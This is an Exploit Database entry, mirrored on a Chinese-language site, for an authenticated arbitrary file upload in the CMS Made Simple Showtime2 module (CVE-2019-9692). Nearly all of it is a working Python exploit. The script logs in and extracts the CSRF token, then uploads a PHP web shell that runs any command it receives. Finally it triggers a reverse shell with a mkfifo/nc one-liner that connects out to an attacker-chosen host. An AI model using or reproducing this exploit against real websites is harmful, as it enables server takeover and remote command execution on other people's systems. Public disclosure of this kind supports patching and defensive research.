CMS Made Simple Showtime2 Module 3.6.2 – (Authenticated) Arbitrary File Upload

• Exploit Database
• 12 阅读

• 作者： Daniele Scanu
  日期： 2019-03-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46546/

• #!/usr/bin/env python
  # Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module
  # Date: March 2019
  # Exploit Author: Daniele Scanu @ Certimeter Group
  # Vendor Homepage: https://www.cmsmadesimple.org/
  # Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2
  # Version: Showtime2 module <= 3.6.2
  # Tested on: CMS Made Simple 2.2.8 in Ubuntu 18.04
  # CVE : 2019-9692
  
  import requests
  import optparse
  from requests_toolbelt.multipart.encoder import MultipartEncoder
  
  parser = optparse.OptionParser()
  parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://192.168.1.10/cms)")
  parser.add_option('-U', '--username', action="store", dest="username", help="Username for login", default="admin")
  parser.add_option('-P', '--password', action="store", dest="password", help="Password for login", default="password")
  parser.add_option('-l', '--local', action="store", dest="local", help="Local uri for reverse shell", default="localhost")
  parser.add_option('-p', '--port', action="store", dest="port", help="Local port for reverse shell", default="2222")
  options, args = parser.parse_args()
  
  if not options.url:
  print "[-] Specify an uri target"
  exit()
  
  if not options.username:
  print "[-] Specify an username for login in administrator panel"
  exit()
  
  if not options.password:
  print "[-] Specify a password for login in administrator panel"
  exit()
  
  base_uri = options.url
  url_login = base_uri + "/admin/login.php"
  user = options.username
  password = options.password
  session = requests.Session()
  __c_var = ""
  lhost = options.local
  lport = options.port
  
  # Login in administrator panel for get the csrf token
  def login(username, password):
  print "[*] Login to cms"
  global __c_var
  credentials = {"username": username, "password": password, "loginsubmit": "Submit"}
  response = session.post(url_login, data=credentials, allow_redirects=False)
  __c_var = response.headers['Location'].split("__c=")[1]
  print "[*] Token value: " + __c_var
  
  # upload a php script with reverse shell in vulnerable functionality
  def upload_shell():
  print "[*] Uploading webshell"
  multipart_data = MultipartEncoder(
  fields = {
  'm1_input_browse': ('shell.php', "<?php system($_REQUEST['cmd']); ?>", 'text/plain'),
  '__c': __c_var,
  'mact': 'Showtime2,m1_,defaultadmin,0',
  'm1_upload_submit': 'Upload'
  }
  )
  response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,
  headers={'Content-Type': multipart_data.content_type})
  
  # Call the script uploaded for spawn a reverse shell
  def spawn_shell():
  print "[*] Spawn a shell to " + lhost + ":" + str(lport)
  payload = {"cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + lhost + " " + str(lport) + " >/tmp/f"}
  requests.post(base_uri + "/uploads/images/shell.php", data=payload)
  
  login(user, password)
  upload_shell()
  spawn_shell()